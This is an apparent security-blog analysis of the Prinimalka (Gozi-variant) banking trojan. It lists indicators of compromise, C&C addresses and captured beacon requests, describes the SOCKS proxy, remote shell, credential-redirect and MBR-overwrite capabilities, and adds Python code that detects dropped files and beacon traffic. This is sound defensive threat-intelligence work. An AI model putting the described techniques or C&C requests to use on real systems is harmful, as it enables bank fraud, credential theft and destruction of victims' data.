Advanced analysis: Uncovering the Trojan Prinimalka Botnet Malware

Trojan Prinimalka, a variant that closely resembles Gozi, has been identified in the reporting around Project Blitzkrieg this fall. It is unclear whether the botherders are part of Project Blitzkrieg, but the operation certainly looks like it. This botnet has been described as a “war on banks”, with the warning that “banks are not ready”.

Then there are the recent attacks on banks, HSBC a few weeks ago and JPMorgan Chase over a month ago; it is unclear whether this botnet was used in those attacks. Researchers at the top security firms are still uncertain about the circumstances of the attacks and have made many attempts to obtain data that would help investigate them.

Described below are some details of the malware used in this botnet: Trj.Prin, as seCURE Connexion labels it, better known as Gozi-Prinimalka or simply Trojan.Prinimalka.

Confused yet? Trojan.Prinimalka is a banking trojan that enrolls the infected host in a botnet, which is then described as a means to DDoS a banking website/server. Note, however, that the capabilities listed below (a SOCKS proxy on the victim, requests to banking sites relayed through the victim’s machine, credential capture) are those of a fraud-proxy trojan, so DDoS is not the only, or necessarily the main, use of these zombies.

Two distinct variants are in use: “gov” and “nah”

Features common to both variants

  • Mutex: sdfsdfsdfsdfsfsdfsdfsdfsdfsdf
  • The dropper writes the bot’s configuration values to the Registry under “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion”.
  • It opens a random port on localhost (127.0.0.1) to serve the type 2 SCKS command, which turns the victim into a SOCKS proxy, and binds cmd.exe to a localhost port for the TELN command, which gives the operator a remote command shell.
  • It relays anonymous requests to banking websites through the zombie (the victim’s computer), so the traffic appears to originate from the victim.
  • It attempts to inject itself into normal Windows system processes such as services.exe, svchost.exe, System, smss.exe, winlogon.exe, lsass.exe and csrss.exe.
  • It also carries a list of targeted bank URLs that can be used in a bait-and-switch operation. Acting much like a HOSTS file, it changes the URL and redirects the banking site so that login credentials or other personal information can be captured.
  • Quick whois queries on the IP addresses return “Ruslan Storozhenko” at the hosting company “Tehnologii Budushego LLC”. This comes as no surprise, since ngrBot was also hosted at Tehnologii Budushego LLC. That is not to say the hosting company itself is bad, but it should be on high alert for fraudulent activity.
  • The IP address 213.155.28.104 is linked to multiple password-stealing and banking trojans. Project Honey Pot lists it as a dictionary attacker and content spammer.

gov

  • Below are the general configuration and the commands observed.
  • Type 1 command example (Windows XP host):
      GET /system/prinimalka.py/command?user_id=33520xxxxx&version_id=022201&crc=00000000 HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
      Host: 213.***.**.104
  • Dropped files:
    • %UserProfile%\govXXXX.exe (the Xs are random lowercase letters)
    • %UserProfile%\govtemp1.exe
    • %UserProfile%\govold.exe
    • %UserProfile%\govcookies.txt
    • %CD%\govcookies.dat
  • Execution on the system starts with govtemp1.exe, the dropper/downloader. It then runs govold.exe to check for and fetch a newer version. The bot can also decide that the host should be shut down, particularly when the computer cannot be used in the botnet (not powerful enough, too much lag, etc.); in that case it overwrites the first four bytes of “\\.\PHYSICALDRIVE0”, which corrupts the start of the master boot record so the machine is unlikely to boot again, and then shuts the computer down.
  • It maintains persistence on the machine by monitoring and reinstalling itself as needed via govXXXX.exe.
  • Primary command and control (C&C) address: 93.115.241.114
  • The configuration can be switched to the nah variant, described below.
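The dropped-file names above are a usable host indicator: the nah variant described below uses the same names with a “nah” prefix. The following is an added example, not code from the original write-up or from any vendor tool, that classifies file names against those patterns for both prefixes and walks a directory tree looking for them. The page shows four placeholder Xs in govXXXX.exe; the example assumes exactly four random letters, which is an assumption, and the sample path listing at the bottom is constructed for the example, not taken from a real infection.

```python
import os
import re

# File names the write-up lists for the gov variant, generalised to the
# nah prefix as well. The page shows four placeholder X's for the random
# letters; this assumes exactly four (an assumption, not a confirmed fact).
DROPPED_FILE_PATTERNS = [
    (re.compile(r"^(gov|nah)temp1\.exe$"), "dropper/downloader"),
    (re.compile(r"^(gov|nah)old\.exe$"), "update stage"),
    (re.compile(r"^(gov|nah)cookies\.(?:txt|dat)$"), "harvested cookies"),
    (re.compile(r"^(gov|nah)[a-z]{4}\.exe$"), "persistence/monitor"),
]


def classify_filename(name):
    """Map a bare file name to its variant and role if it matches one of
    the dropped-file patterns, else None. Windows file names are
    case-insensitive, so the comparison is done on the lower-cased name."""
    lowered = name.lower()
    for pattern, role in DROPPED_FILE_PATTERNS:
        m = pattern.match(lowered)
        if m:
            return {"variant": m.group(1), "role": role}
    return None


def classify_paths(paths):
    """Classify a list of full paths; accepts Windows or POSIX separators."""
    findings = []
    for path in paths:
        name = re.split(r"[\\/]", path)[-1]
        hit = classify_filename(name)
        if hit:
            findings.append({"path": path, **hit})
    return findings


def sweep(root):
    """Walk a directory tree and classify every file found in it."""
    paths = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            paths.append(os.path.join(dirpath, fn))
    return classify_paths(paths)


# Constructed sample listing for the example (not from a real infection).
SAMPLE_PATHS = [
    r"C:\Users\alice\govabcd.exe",
    r"C:\Users\alice\govtemp1.exe",
    r"C:\Users\alice\govcookies.txt",
    r"C:\Users\alice\Documents\report.docx",
    r"C:\Users\bob\nahold.exe",
    r"C:\Users\bob\nahcookies.dat",
    r"C:\Users\bob\nahtemp12.exe",   # near miss: must not match
    r"C:\Windows\System32\svchost.exe",
]

if __name__ == "__main__":
    for f in classify_paths(SAMPLE_PATHS):
        print(f["variant"], f["role"], f["path"])
```

The fixed names are tested before the four-random-letter pattern so that, for example, govtemp1.exe is reported as the dropper and not as a generic persistence binary; sweep() can be pointed at a mounted image of a suspect profile directory.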

nah

  • The nah variant has essentially the same features as gov; its files are simply prefixed with “nah” instead of “gov”.
  • It does use a different check-in (type 2 command, Windows XP host), which additionally reports uptime, a port (presumably the proxy port the bot opened on localhost) and an ip field:
      GET /system/prinimalka.py/options?user_id=33520xxxxx&version_id=022201&crc=34661b26&uptime=00:00:00:59&port=5641&ip= HTTP/1.1
      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
      Host: 193.xxx.92.xxx
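Both check-ins, the type 1 /command beacon of the gov variant and the type 2 /options beacon of the nah variant, share a recognisable URI and a fixed set of query parameters, which makes them easy to pull out of proxy or IDS logs. The following is an added example, not code from the original write-up, that parses such requests out of raw HTTP text and extracts the bot fields for either type. The sample requests at the bottom are constructed for the example: the user_id, crc and Host values are placeholders (203.0.113.x are documentation addresses), not the masked values from the captures above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Beacon URI seen in both captures: type 1 = /command, type 2 = /options.
BEACON_PATH = re.compile(r"^/system/prinimalka\.py/(command|options)$")
REQUEST_LINE = re.compile(r"^GET\s+(\S+)\s+HTTP/1\.[01]$")


def parse_beacon(raw_request):
    """Return the bot fields from one raw HTTP request, or None if the
    request is not a Prinimalka check-in."""
    lines = raw_request.replace("\r\n", "\n").split("\n")
    m = REQUEST_LINE.match(lines[0].strip())
    if not m:
        return None
    url = urlsplit(m.group(1))
    pm = BEACON_PATH.match(url.path)
    if not pm:
        return None
    # keep_blank_values so the empty "ip=" of the type 2 beacon survives.
    query = parse_qs(url.query, keep_blank_values=True)

    def first(key):
        return query.get(key, [""])[0]

    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    beacon = {
        "type": 1 if pm.group(1) == "command" else 2,
        "user_id": first("user_id"),
        "version_id": first("version_id"),
        "crc": first("crc"),
        "host": headers.get("host", ""),
        "user_agent": headers.get("user-agent", ""),
    }
    if beacon["type"] == 2:
        # The options beacon adds uptime, the port the bot opened and an ip field.
        beacon["uptime"] = first("uptime")
        beacon["port"] = int(first("port")) if first("port").isdigit() else None
        beacon["ip"] = first("ip")
    return beacon


def scan_requests(raw_requests):
    """Run parse_beacon over many raw requests and keep only the hits."""
    hits = []
    for raw in raw_requests:
        beacon = parse_beacon(raw)
        if beacon is not None:
            hits.append(beacon)
    return hits


# Constructed sample traffic for the example (placeholder values, not captured data).
SAMPLE_REQUESTS = [
    # type 1, gov-style check-in
    "GET /system/prinimalka.py/command?user_id=3352001234&version_id=022201"
    "&crc=00000000 HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Host: 203.0.113.10\r\n\r\n",
    # benign request that must not match
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    # type 2, nah-style check-in
    "GET /system/prinimalka.py/options?user_id=3352001234&version_id=022201"
    "&crc=34661b26&uptime=00:00:00:59&port=5641&ip= HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Host: 203.0.113.20\r\n\r\n",
]

if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(hit)
```

Matching on the full /system/prinimalka.py/ path rather than on the C&C IP is deliberate: the Host values in the captures are masked and the C&C can move, while the script name and parameter set are what both variants have in common.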

Overall, this banking trojan has a fairly robust set of capabilities, but nothing really new. It closely resembles the Gozi trojan, and may be competing with other botnets such as TDL.


About Jay Pfoutz

Marketer